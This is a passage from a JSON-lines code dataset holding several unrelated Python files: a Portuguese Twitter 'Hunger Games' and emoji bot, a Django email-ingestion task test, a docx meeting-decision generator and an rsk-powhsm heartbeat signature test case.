[['Gabriel3wefsd','Werneckasfq'],['Yasminhtyhd','Mayaraffrewg'],['Lucianosdgvrth','Tutdasgwefgs'],['Gustavobtgym','Amandaikghd'],['Pedroryjfs','Maryyxjvfb'],['Douglasxhjxdh','Caiolmxzsdk'],['AGabriel3wefsd','AWerneckasfq'],['AYasminhtyhd','AMayaraffrewg'],['ALucianosdgvrth','ATutdasgwefgs'],['AGustavobtgym','AAmandaikghd'],['APedroryjfs','AMaryyxjvfb'],['ADouglasxhjxdh','ACaiolmxzsdk'],[]]\r\n #participantesOriginais = [['Gabriel3wefsd','Werneckasfq'],['Yasminhtyhd','Mayaraffrewg'],['Lucianosdgvrth','Tutdasgwefgs'],['Gustavobtgym','Amandaikghd'],['Pedroryjfs','Maryyxjvfb'],['Douglasxhjxdh','Caiolmxzsdk'],['AGabriel3wefsd','AWerneckasfq'],['AYasminhtyhd','AMayaraffrewg'],['ALucianosdgvrth','ATutdasgwefgs'],['AGustavobtgym','AAmandaikghd'],['APedroryjfs','AMaryyxjvfb'],['ADouglasxhjxdh','ACaiolmxzsdk'],[]]\r\n #participantesVivosLista = ['Gabriel3wefsd','Werneckasfq','Yasminhtyhd','Mayaraffrewg','Lucianosdgvrth','Tutdasgwefgs','Gustavobtgym','Amandaikghd','Pedroryjfs','Maryyxjvfb','Douglasxhjxdh','Caiolmxzsdk','AGabriel3wefsd','AWerneckasfq','AYasminhtyhd','AMayaraffrewg','ALucianosdgvrth','ATutdasgwefgs','AGustavobtgym','AAmandaikghd','APedroryjfs','AMaryyxjvfb','ADouglasxhjxdh','ACaiolmxzsdk']\r\n #cont = 24\r\n #endregion\r\n\r\n\r\n #region Não há pessoas suficientes pra prosseguir o evento, completando com bots!\r\n if (cont < 24):\r\n file = open(\"bots.txt\", \"r\")\r\n bots = file.readlines()\r\n file.close()\r\n qtdBots = 24 - cont\r\n listaBots = random.sample(bots, qtdBots)\r\n while cont < 24:\r\n bot = listaBots.pop()\r\n num = str(random.randint(100,999))\r\n participantesVivos[i].append(\"Bot\"+bot.strip()+str(num))\r\n participantesOriginais[i].append(\"Bot\"+bot.strip()+str(num))\r\n participantesVivosLista.append(\"Bot\"+bot.strip()+str(num))\r\n if (cont % 2 == 1):\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n print(participantesOriginais)\r\n #endregion\r\n\r\n #region Carregando as frases de 'frases HG.txt' em seus respectivos vetores e misturando os vetores\r\n frasesHGTXT = open(\"frases HG.txt\",\"r\")\r\n momento = \"\"\r\n mataMata, causasNaturais, items, noite, noiteEmDupla = [], [], [], [], []\r\n for linha in frasesHGTXT:\r\n if(linha.strip().isupper()):\r\n 
momento = linha.strip()\r\n continue\r\n if(momento == \"MATA MATA\"):\r\n mataMata.append(linha.strip())\r\n continue\r\n elif(momento == \"CAUSAS NATURAIS\"):\r\n causasNaturais.append(linha.strip())\r\n continue\r\n elif(momento == \"ITEMS\"):\r\n items.append(linha.strip())\r\n continue\r\n elif(momento == \"NOITE\"):\r\n noite.append(linha.strip())\r\n continue\r\n elif(momento == \"NOITE EM DUPLA\"):\r\n noiteEmDupla.append(linha.strip())\r\n continue\r\n\r\n frasesHGTXT.close()\r\n cMM, cCN, cI, cN, cNED = 0, 0, 0, 0, 0\r\n mataMata = random.sample(mataMata,len(mataMata))\r\n causasNaturais = random.sample(causasNaturais, len(causasNaturais))\r\n items = random.sample(items, len(items))\r\n noite = random.sample(noite, len(noite))\r\n noiteEmDupla = random.sample(noiteEmDupla, len(noiteEmDupla))\r\n #endregion\r\n\r\n #region Carregando vetores com dizeres quando não acontece o evento\r\n eventoSemTiro = ['Sem tiros de canhão hoje\\n\\nsó isso mesmo','Não houveram mortes hoje','Ninguém morreu hoje\\nimpressionante, mas o jogo tem que continuar :)','Não houveram tiros de canhão hoje\\nserá que hoje os tributos dormem mais tranquilos?', 'Nenhum tiro de canhão foi dado hoje']\r\n eventoSemTiro = random.sample(eventoSemTiro, len(eventoSemTiro))\r\n cEST = 0\r\n\r\n eventoCombatesDiretos = ['Os tributos não se encontraram no soco hoje\\nsorte? acho que não\\ncoincidência? talvez\\nhotel? trivago','Ninguém encontrou ninguém\\nNinguém matou ninguém\\nsem combates diretos hoje','Não houveram mano a mano hoje\\nmas aposto que amanhã vai ter ;)','Vem pro x1! não?\\nta, hoje não teve x1']\r\n eventoCombatesDiretos = random.sample(eventoCombatesDiretos, len(eventoCombatesDiretos))\r\n cECD = 0\r\n # endregion\r\n\r\n #region Apresentação dos tributos, pegar os tributos do vetor dos participantes que entraram no evento (+300 segs)\r\n statusText = '''Conheçam os tributos:'''\r\n i = 0\r\n participantesVivos.pop()\r\n metade = False\r\n for linha in participantesVivos:\r\n statusText += f\"\\nD{i + 1}:\"\r\n for pessoa in linha:\r\n statusText += \" @\"+pessoa+\" e\"\r\n statusText = statusText[:-2]+\"\"\r\n i += 1\r\n if (i % (len(participantesVivos)/2) == 0 and not metade):\r\n tweetarXmin(statusText, 30)\r\n statusText = \"\"\r\n metade = True\r\n statusText += \"\\nCom isso fecham os tributos selecionados\"\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText,300,tweet)\r\n # endregion\r\n\r\n acabou = False\r\n dia = 1\r\n primeiroMomento = True\r\n while not acabou:\r\n aindaNaoMataram = participantesVivosLista.copy()\r\n mortesDoDia = []\r\n\r\n #region Primeiro momento, evento de abertura da cornucópia\r\n if (primeiroMomento):\r\n primeiroMomento = False\r\n addSorte = 0\r\n sorte = 0\r\n statusText = \"\"\r\n dado = random.randint(1,100)\r\n if (dado % 42 == 0):\r\n morre = participantesVivosLista[random.randint(0,len(participantesVivosLista) - 1)]\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n mortesDoDia.append(morre)\r\n statusText += f\"\\na plataforma de @{morre} explode pq começou se afobou\"\r\n statusText += f\"\\ncomeça a corrida, alguns se escondem, outros tentam a sorte na cornucopia, sangue rola logo no início\"\r\n while sorte <= 45:\r\n if (len(aindaNaoMataram) < 2):\r\n break\r\n mata, morre = random.sample(aindaNaoMataram, 2)\r\n aindaNaoMataram.remove(mata)\r\n aindaNaoMataram.remove(morre)\r\n\r\n\r\n 
participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n statusText += f\"\\n@{mata} matou @{morre} {mataMata[cMM]}\"\r\n cMM += 1\r\n mortesDoDia.append(morre)\r\n\r\n addSorte += random.randint(10,15)\r\n sorte = random.randint(0, 100) + addSorte\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n\r\n\r\n tweetarXmin(statusText, 150)\r\n # endregion\r\n\r\n if (acabou):\r\n break\r\n\r\n #region evento de x1 onde pessoa X mata pessoa Y (+30~300 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,200)\r\n contador = 1\r\n metade = False\r\n statusText = f\"Dia {dia}:\"\r\n if (sorte > 180):\r\n statusText += \"\\n\" + eventoCombatesDiretos[cECD]\r\n cECD += 1\r\n while sorte <= 180:\r\n if (len(aindaNaoMataram) < 2):\r\n break\r\n mata, morre = random.sample(aindaNaoMataram, 2)\r\n aindaNaoMataram.remove(mata)\r\n aindaNaoMataram.remove(morre)\r\n\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos,\r\n participantesVivosLista, morre)\r\n statusText += f\"\\n@{mata} matou @{morre} {mataMata[cMM]}\"\r\n cMM += 1\r\n mortesDoDia.append(morre)\r\n contador += 1\r\n\r\n\r\n addSorte += random.randint(30, 35)\r\n sorte = random.randint(0, 100) + addSorte\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n if(not contador % MAX_LINHAS == 0):\r\n if(metade):\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, min(300, 15*contador), tweet)\r\n else:\r\n tweetarXmin(statusText, min(15*contador, 300))\r\n statusText = ''\r\n else:\r\n esperar(min(300, 15*contador))\r\n #endregion\r\n\r\n #region Evento morrer sozinho (+15~300 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,100)\r\n contador = 1\r\n metade = False\r\n statusText = f\"Dia {dia}:\"\r\n\r\n if (sorte > 80):\r\n statusText = \"\"\r\n while sorte <= 75:\r\n addSorte += random.randint(15, 20)\r\n sorte = random.randint(0,100) + addSorte\r\n morre = random.sample(participantesVivosLista, 1)[0]\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n mortesDoDia.append(morre)\r\n contador += 1\r\n\r\n statusText += f\"\\n@{morre} {causasNaturais[cCN]}\"\r\n cCN += 1\r\n if(len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n if(statusText):\r\n if(not metade):\r\n tweetarXmin(statusText, 15*contador)\r\n else:\r\n esperar(15*contador)\r\n #endregion\r\n\r\n #region Patrocinador ajudando (150 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,100)\r\n statusText = f\"Dia {dia}:\"\r\n if (sorte <= 10):\r\n sortudo = 
random.sample(participantesVivosLista, 1)[0]\r\n statusText += f\"\\nolha que sorte\\nparece que os patrocinadores estão de olho em @{sortudo} e lhe deram {items[cI]}\\nesperamos que saiba como utilizar\"\r\n cI += 1\r\n tweetarXmin(statusText, 150)\r\n #endregion\r\n\r\n #region Anunciar mortos do dia se não tiver terminado o evento\r\n if(len(mortesDoDia) == 0):\r\n statusText = eventoSemTiro[cEST]\r\n cEST += 1\r\n tweetarXmin(statusText, 180)\r\n else:\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n break\r\n #endregion\r\n\r\n #region Evento para os 2 útilmos participantes\r\n if (len(participantesVivosLista) == 2):\r\n statusText = \"\"\r\n dado = random.randint(1, 200)\r\n if (dado == 99):\r\n statusText = f'''\r\n@{participantesVivosLista[0]} já não é a mesma pessoa de quando começou.\r\n@{participantesVivosLista[1]} também não está nada bem\r\nambos se encontram na cornucopia\r\nlágrimas escorrem\r\nambos se encaram\r\no destino é certo\r\n...\r\nambos decidem se matar em protesto ao banho de sangue\r\n'''\r\n tweetarXmin(statusText, 0)\r\n return None\r\n mata, morre = random.sample(participantesVivosLista, 2)\r\n\r\n statusText += f\"Os ultimos sobreviventes se encontram\\nUtilizam de todo seu potencial e\\n@{mata} mata @{morre}\\ntornando-se a última pessoa de pé em uma arena ensanguentada\\nParabéns merecidamente!\\nSigam a página, RT+Fav :]\"\r\n\r\n tweetarXmin(statusText, 0)\r\n return None\r\n #endregion\r\n\r\n #region Evento da noite (30~300 segs)\r\n\r\n addSorte = 0\r\n sorte = random.randint(0, 100)\r\n statusText = f\"Noite {dia}:\"\r\n listaNoite = random.sample(participantesVivosLista, len(participantesVivosLista))\r\n contador = 1\r\n\r\n metade = False\r\n while sorte <= 100:\r\n addSorte += random.randint(15, 30)\r\n sorte = random.randint(0, 60)\r\n dado = random.randint(0, 4)\r\n if (dado):\r\n pessoa = listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} {noite[cN]}\"\r\n cN += 1\r\n elif (len(listaNoite) >= 2 and len(participantesVivosLista) >= 4):\r\n pessoa, dupla = listaNoite.pop(), listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} e @{dupla} {noiteEmDupla[cNED]}\"\r\n cNED += 1\r\n else:\r\n pessoa = listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} achou {items[cI]}\"\r\n cI += 1\r\n if (not listaNoite):\r\n break\r\n contador += 1\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n statusText = ''\r\n if (not metade):\r\n tweetarXmin(statusText, 15 * contador)\r\n else:\r\n esperar(15 * contador)\r\n # endregion\r\n\r\n dia += 1\r\n\r\n #region 1 sobreviveu\r\n vencedor = participantesVivosLista[0]\r\n statusText = f'''\r\nDepois de muita luta, fuga, camuflagem e esperteza\r\nquem sobreviveu foi @{vencedor}\r\n\r\nParabéns, merecidamente\r\n\r\nSigam a página para mais eventos, Fav+RT = Humilde :]\r\n'''\r\n tweetarXmin(statusText, 0)\r\n #endregion\r\n\r\n\r\n\r\ndef tweetToTwitter():\r\n while True:\r\n #emotesUsar = list(random.sample(todosEmotes, random.randint(1, 4)))\r\n\r\n #qlPostar = 2\r\n qlPostar = random.randint(0, QTDEVENTOS - 1)\r\n # DNA Random\r\n if(qlPostar == 0):\r\n emotesUsar = list(random.sample(todosEmotes, random.randint(1, 4)))\r\n statusText = f'''{frases[random.randint(0, 
len(frases)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n'''\r\n # DNA 2 emojis\r\n elif (qlPostar == 1):\r\n emotesUsar = list(random.sample(todosEmotes, 2))\r\n statusText = f'''{frases[random.randint(0, len(frases) - 1)]}\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n⬜⬜{emotesUsar[0]}⬜⬜\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n⬜⬜{emotesUsar[1]}⬜⬜\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n⬜⬜{emotesUsar[0]}⬜⬜\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n⬜⬜{emotesUsar[1]}⬜⬜\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n '''\r\n # Guerra de emoji\r\n elif (qlPostar == 2):\r\n emotesUsar = list(random.sample(todosEmotes, 3))\r\n statusText = f'''\r\n QUEM GANHA??\r\n RT | FAV\r\n{emotesUsar[0]}⬜⬜⬜🆚⬜⬜⬜{emotesUsar[2]}\r\n⬜{emotesUsar[0]}⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n⬜⬜{emotesUsar[0]}⬜🆚⬜⬜{emotesUsar[2]}⬜\r\n{emotesUsar[0]}⬜⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n⬜⬜⬜⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜⬜{emotesUsar[0]}⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚⬜⬜⬜⬜\r\n⬜⬜⬜{emotesUsar[0]}🆚⬜⬜{emotesUsar[2]}⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜⬜⬜{emotesUsar[0]}🆚⬜⬜{emotesUsar[2]}⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n'''\r\n\r\n print('\\nTweetando:')\r\n print(statusText)\r\n resp = input(\"Publicar?(S/N)\\n\")\r\n if(resp == \"S\" or resp == \"s\"):\r\n api.update_status(status=statusText)\r\n 
break\r\n resp = input(\"Gerar outro?(S/N)\\n\")\r\n if (resp == \"N\" or resp == \"n\"):\r\n break\r\n\r\n\r\ndef main():\r\n print('Bom dia')\r\n for categoria in emojis.db.get_categories():\r\n #print(categoria)\r\n for emote in emojis.db.get_emojis_by_category(categoria):\r\n #print(emote[1])\r\n if(len(emote[1]) == 1):\r\n todosEmotes.append(emote[1])\r\n #print(todosEmotes)\r\n resp = input('''\r\n Escolha uma opção:\r\n 1 - Tweetar\r\n 2 - Rodar HG\r\n S - sair\r\n ''')\r\n if(resp == \"1\"):\r\n tweetToTwitter()\r\n elif (resp == \"2\"):\r\n hungerGamesEvent()\r\n else:\r\n print('flw enton')\r\nif __name__ == \"__main__\":\r\n hungerGamesEvent()\r\n #main()","repo_name":"gabrielhbcs/emojiCreatorBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27678,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39330165340","text":"from unittest import mock\n\nimport pytest\nfrom django.test.utils import override_settings\n\nfrom datahub.email_ingestion.mailbox import MailboxHandler\nfrom datahub.email_ingestion.tasks import ingest_emails\nfrom datahub.email_ingestion.test.utils import MAILBOXES_SETTING, mock_import_string\nfrom datahub.feature_flag.models import FeatureFlag\nfrom datahub.feature_flag.test.factories import FeatureFlagFactory\nfrom datahub.interaction import INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME\n\n\n@pytest.fixture()\ndef interaction_email_ingestion_feature_flag():\n \"\"\"\n Creates the email ingestion feature flag.\n \"\"\"\n yield FeatureFlagFactory(code=INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME)\n\n\n@pytest.mark.django_db\n@pytest.mark.usefixtures('interaction_email_ingestion_feature_flag')\nclass TestIngestEmails:\n \"\"\"\n Test ingest_emails celery task.\n \"\"\"\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_emails_lock_acquired(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are processed when the lock is acquired.\n \"\"\"\n # Mock import_string to avoid import errors for processor_class path strings\n mock_import_string(monkeypatch)\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n # Refresh the mailbox_handler singleton as we have overidden the MAILBOXES setting\n mailbox_handler = MailboxHandler()\n mailbox_handler.initialise_mailboxes()\n monkeypatch.setattr(\n 'datahub.email_ingestion.tasks.mailbox_handler',\n mailbox_handler,\n )\n ingest_emails()\n assert process_new_mail_patch.call_count == 2\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_emails_lock_not_acquired(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are not processed when the lock cannot be acquired successfully.\n \"\"\"\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n # Have to mock rather than acquire the lock as locks are per connection (if the lock is\n # already held by the current connection, the current connection can still re-acquire it).\n advisory_lock_mock = mock.MagicMock()\n advisory_lock_mock.return_value.__enter__.return_value = False\n monkeypatch.setattr('datahub.email_ingestion.tasks.advisory_lock', advisory_lock_mock)\n\n ingest_emails()\n 
assert process_new_mail_patch.called is False\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_feature_flag_inactive(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are not processed when the feature flag is not active.\n \"\"\"\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n flag = FeatureFlag.objects.get(code=INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME)\n flag.is_active = False\n flag.save()\n\n ingest_emails()\n assert process_new_mail_patch.called is False\n","repo_name":"uktrade/data-hub-api-actions-test","sub_path":"datahub/email_ingestion/test/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22604732728","text":"import docx\nimport time as t\nfrom docx.shared import Pt, Mm\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT, WD_LINE_SPACING\n\n\ndef create_decision(name, type, date_time, form, questions, zaoch_list, protocol_date, current_date):\n new_form = form.replace('ой', 'ого')\n type = type.replace('ое', 'ого')\n total_ochno = questions[0].yes + questions[0].no + questions[0].idk\n total_zaochno = zaoch_list[0][0]+zaoch_list[0][1]+zaoch_list[0][2]\n\n if (total_ochno + total_zaochno) > 0.5*49:\n quorum = 'да'\n else:\n quorum = 'нет'\n\n doc = docx.Document(name)\n for para in doc.paragraphs:\n text = para.text\n text = text.replace('<
>', new_form)\n text = text.replace('<>', type)\n text = text.replace('<>', current_date)\n para.text = text\n\n for question in questions:\n p = doc.add_paragraph(question.question)\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(f'Решение: {question.decision}')\n p.paragraph_format.first_line_indent = Mm(7.5)\n\n if new_form == 'очно-заочного':\n doc.add_paragraph()\n p = doc.add_paragraph(\n 'Решение принято на основании голосования в очно-заочной форме путем суммы голосов за очную часть голосования и заочную часть голосования.')\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(f'Общее количество членов СНТ 1: 49')\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(\n f'Очно: {total_ochno}'\n )\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(\n f'Заочно: {total_zaochno}'\n )\n p.paragraph_format.first_line_indent = Mm(7.5)\n if quorum == 'да':\n p = doc.add_paragraph(\n f'Кворум установлен ({total_ochno + total_zaochno} голосов в сумме)'\n )\n p.paragraph_format.first_line_indent = Mm(7.5)\n else:\n p = doc.add_paragraph(\n f'Кворум не установлен ({total_ochno + total_zaochno} голосов в сумме)'\n )\n p.paragraph_format.first_line_indent = Mm(7.5)\n\n doc.add_paragraph()\n doc.add_paragraph()\n p = doc.add_paragraph(f'Председатель правления СНТ « СНТ 1».')\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph('[подпись]_____________/[расшифровка] Кузнецов С.М.')\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(f'Дата {current_date}')\n p.paragraph_format.first_line_indent = Mm(7.5)\n style = doc.styles['Normal']\n style.font.name = 'Times New Roman'\n style.font.size = Pt(14)\n for para in range(4, len(doc.paragraphs)):\n doc.paragraphs[para].paragraph_format.line_spacing_rule = WD_LINE_SPACING.ONE_POINT_FIVE\n doc.paragraphs[para].alignment = WD_PARAGRAPH_ALIGNMENT.JUSTIFY\n name = f'reshenie_{int(t.time())}.docx'\n doc.save(f'./uploads/{name}')\n return name","repo_name":"sevagrbnv/konsultant","sub_path":"djangoproject/Utils/DecisionCreator.py","file_name":"DecisionCreator.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74670937389","text":"from .case import TestCase, TestCaseError\nimport secp256k1 as ec\nimport hmac\nimport hashlib\n\n\nclass Heartbeat(TestCase):\n EXPECTED_HEADER = \"HSM:SIGNER:HB:4.0:\"\n EHL = len(EXPECTED_HEADER)\n\n @classmethod\n def op_name(cls):\n return \"heartbeat\"\n\n def __init__(self, spec):\n self.ud_value = spec[\"udValue\"]\n\n super().__init__(spec)\n\n def run(self, dongle, debug, run_args):\n def normalize_hex_sig_component(h):\n h = bytes.fromhex(h)\n h = int.from_bytes(h, byteorder=\"big\", signed=False)\n return h.to_bytes(32, byteorder=\"big\", signed=False)\n\n def get_message_part(msg, part):\n try:\n return ({\n \"best_block\": lambda m: m[self.EHL*2:(self.EHL+32)*2],\n \"last_tx\": lambda m: m[(self.EHL+32)*2:(self.EHL+32+8)*2],\n })[part](msg)\n except KeyError:\n raise TestCaseError(f\"Unknown message part \\\"{part}\\\"\")\n except Exception as e:\n raise TestCaseError(str(e))\n\n try:\n heartbeat = dongle.get_signer_heartbeat(self.ud_value)\n debug(f\"Heartbeat: {heartbeat}\")\n\n if not heartbeat[0]:\n error_code = heartbeat[1]\n raise TestCaseError(\"Expected success getting the heartbeat \"\n f\"but got error code {error_code}\")\n heartbeat = heartbeat[1]\n\n # Validate signature\n message 
= bytes.fromhex(heartbeat[\"message\"])\n pubkey = ec.PublicKey(bytes.fromhex(heartbeat[\"pubKey\"]), raw=True)\n norm_r = normalize_hex_sig_component(heartbeat[\"signature\"].r)\n norm_s = normalize_hex_sig_component(heartbeat[\"signature\"].s)\n sig = pubkey.ecdsa_deserialize_compact(norm_r + norm_s)\n tweak = hmac.new(\n bytes.fromhex(heartbeat[\"tweak\"]),\n pubkey.serialize(compressed=False),\n hashlib.sha256,\n ).digest()\n pubkey = pubkey.tweak_add(tweak)\n\n if not pubkey.ecdsa_verify(message, sig):\n raise TestCaseError(\"Expected signature to be valid but it wasn't\")\n\n # Validate header\n header_msg = message[:self.EHL].decode('ascii')\n if header_msg != self.EXPECTED_HEADER:\n raise TestCaseError(f\"Expected header to be {self.EXPECTED_HEADER} but\"\n f\" got {header_msg}\")\n\n # Validate UD value\n ud_msg = message[-16:].hex()\n if ud_msg != self.ud_value:\n raise TestCaseError(f\"Expected UD value to be {self.ud_value} but\"\n f\" got {ud_msg}\")\n\n # Expectations on the heartbeat message (optional)\n if type(self.expected) == dict:\n message = message.hex()\n for key in self.expected:\n val = get_message_part(message, key)\n if val != self.expected[key]:\n raise TestCaseError(f\"Expected {key} to be {self.expected[key]} \"\n f\"but got {val}\")\n except RuntimeError as e:\n raise TestCaseError(str(e))\n","repo_name":"rsksmart/rsk-powhsm","sub_path":"ledger/test/cases/heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"1832458488","text":"\r\n# Take n greater than 0.25 and less than 5\r\nsame=True\r\nn=0.3\r\n\r\n# Adding a background image\r\nbackground_image =Image.open(\"library.jpg\")\r\n[imageSizeWidth, imageSizeHeight] = background_image.size\r\n\r\nnewImageSizeWidth = 